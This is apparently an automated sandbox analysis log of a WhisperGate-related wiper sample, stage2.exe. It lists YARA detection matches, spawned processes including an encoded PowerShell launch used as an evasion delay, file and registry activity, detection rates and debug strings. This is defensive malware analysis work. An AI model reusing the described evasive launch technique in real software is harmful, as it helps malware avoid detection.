    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04A6CB10
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E75768
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E76728
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E78310
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E79058
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E71B88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E79820
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E71B78
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3DFA8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3F278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3EF20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3A16F
    Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exeBinary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: stage2.exeStatic PE information: invalid certificate
    Source: stage2.exeVirustotal: Detection: 44%
    Source: stage2.exeReversingLabs: Detection: 48%
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Users\user\Desktop\stage2.exeJump to behavior
    Source: stage2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\stage2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220117Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1Jump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@8/14@1/2
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\stage2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: stage2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: stage2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
